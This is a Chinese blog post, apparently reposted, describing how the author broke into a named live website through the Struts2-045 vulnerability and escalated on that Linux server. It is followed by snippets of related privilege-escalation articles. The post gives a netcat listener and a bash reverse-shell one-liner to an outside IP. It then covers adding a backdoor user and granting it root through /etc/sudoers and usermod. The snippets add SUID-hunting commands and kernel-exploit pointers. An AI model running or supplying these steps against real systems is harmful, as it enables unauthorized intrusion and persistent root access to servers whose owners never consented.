记一次初步Linux提权

前言、

提权这么久了  还是头一次提下Linux的服务器。。。

由于之前一直钻研的win服务器  要不是前些日子爆出来Struts2-045漏洞

估计还没时间接触Linux提权....

正文、

st2漏洞页面

http://www.dainar.com/index.action

  

可以看到是root权限的

接着就是想办法添加一个root组的用户

由于添加用户需要两次重复输入密码(不像win服务器直接net user)

所以nc反弹一个shell到外网服务器上

nc -vv -l -p 2333

  在st2工具里输入

bash -i >& /dev/tcp/10.0.0.1/2333 0>&1

  10.0.0.1是你的外网ip  2333是你监听的端口

然后执行反弹 成功反弹上来后

添加用户、

用adduser命令添加一个普通用户,命令如下:
#adduser sf197  //添加一个名为sf197的用户
#passwd sf197   //修改密码
Changing password for user sf197.
New UNIX password:     //在这里输入新密码
Retype new UNIX password:  //再次输入新密码
passwd: all authentication tokens updated successfully.//建立成功。

  

添加用户到root组、

方法一:修改 /etc/sudoers 文件,找到下面一行,把前面的注释(#)去掉
## Allows people in group wheel to run all commands
%wheel    ALL=(ALL)    ALL
然后修改用户,使其属于root组(wheel),命令如下:
#usermod -g root sf197
修改完毕,现在可以用sf197帐号登录,然后用命令 su - ,即可获得root权限进行操作。


方法二:修改 /etc/sudoers 文件,找到下面一行,在root下面添加一行,如下所示:
## Allow root to run any commands anywhere
root    ALL=(ALL)     ALL
sf197   ALL=(ALL)     ALL
修改完毕,现在可以用sf197帐号登录,然后用命令 su - ,即可获得root权限进行操作。

成功添加完毕

用ssh协议连接服务器  执行id返回root组!

转载请注明本文作者:admin-神风

本文来源:http://www.cnblogs.com/wh4am1/p/6580153.html

时间: 2024-10-31 22:42:53

记一次初步Linux提权的相关文章

Linux提权:从入门到放弃

日站就要日个彻底.往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面.Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置.一下是我总结的一些提权方法. 几点前提 已经拿到低权shell 被入侵的机器上面有nc,python,perl等linux非常常见的工具 有权限上传文件和下载文件 内核漏洞提权 提到脏牛,运维流下两行眼泪,我们留下两行鼻血.内核漏洞是我们几乎最先想到的提权方法.通杀的内核漏洞是十分少见的,因而我们应该先对系统相关

Linux 提权常用命令集

转载:http://www.myhack58.com/Article/html/3/8/2017/83236.htm 0x00 操作系统相关 操作系统类型版本 cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian cat /etc/redhat-release # Redhat 内核版本,是否是64位 cat /proc/version uname -a uname -mrs rpm -q kernel dmesg | g

史上最全Linux提权后获取敏感信息方法

在本文开始之前,我想指出我不是专家.据我所知,在这个庞大的区域,没有一个“神奇”的答案.分享,共享(我的出发点).下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物.我知道有更多的“东西”去寻找.这只是一个基本粗略的指南.并不是每一个命令,做好要注重细节. 文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的linux中所使用的命令. 列举关键点 (Linux)的提权是怎么一回事:  收集 – 枚举,枚举和一些更多的枚举.  过程 – 

Linux提权-suid提权

0x1 suid概念 通俗理解为其他用户执行这个程序是可以用该程序所有者/组的权限 0x2 suid提权 简单理解为,一个文件有s标志(权限中包含s),并且对应的是root权限,那么当运行这个程序时就有root权限,且这个程序还能执行命令.此时就能从普通用户提升到root权限了. 0x3 常见可用suid提权的命令 0x4 查找特权文件命令 具体来说,这些命令将尝试查找具有root权限的SUID的文件 find / -user root -perm -4000 -print 2>/dev/nul

记一次ms16-032成功提权win7/win12

E:\Tools\提权大结合\ms16-032>whoami pc-20140503jfge\administrator 首先查看权限是administrator 随后溢出 可以看到是system权限了 这是拿我本机试的. 可以在win12上成功溢出 exp不开源

CVE-2017-0213 | 记一次失败的提权经历

环境: CVE-2017-0213下载 提权步骤: 提权失败.... 好迷啊,,,,事后查了一下补丁 我的wind7上也没装啊,然后防火墙也是关闭的 迷了迷了.... 原文地址:https://www.cnblogs.com/chrysanthemum/p/11588250.html

Linux提权列表

#CVE #Description #Kernels CVE-2017-1000367 [Sudo] (Sudo 1.8.6p7 - 1.8.20) CVE-2017-7494 [Samba Remote execution] (Samba 3.5.0-4.6.4/4.5.10/4.4.14) CVE-2016-5195 [Dirty cow] (Linux kernel>2.6.22 (released in 2007)) CVE-2016-0728 [pp_key] (3.8.0, 3.8.

linux提权辅助工具(四):LinEnum.sh

来自:https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh #!/bin/bash #A script to enumerate local information from a Linux host version="version 0.94" #@rebootuser #help function usage () { echo -e "\n\e[00;31m#############

Linux提权思路

先写个大概 0. dirtycow 常见的情况需要区分CentOS和Ubuntu发行版使用不同的dirtycow exploit. 1. 内核漏洞 不同内核对应不同exploit 2. Pwn suid文件 suid文件为以文件所有者权限运行的文件,文件所有者为root的suid文件值得注意. 3. Pwn 高权限进程或者服务 查看高权限的service,是否有可利用的exploit. 4. Corntab 高权限定时任务 是否可以编辑以root运行的corntab脚本 5. Sudo -l 看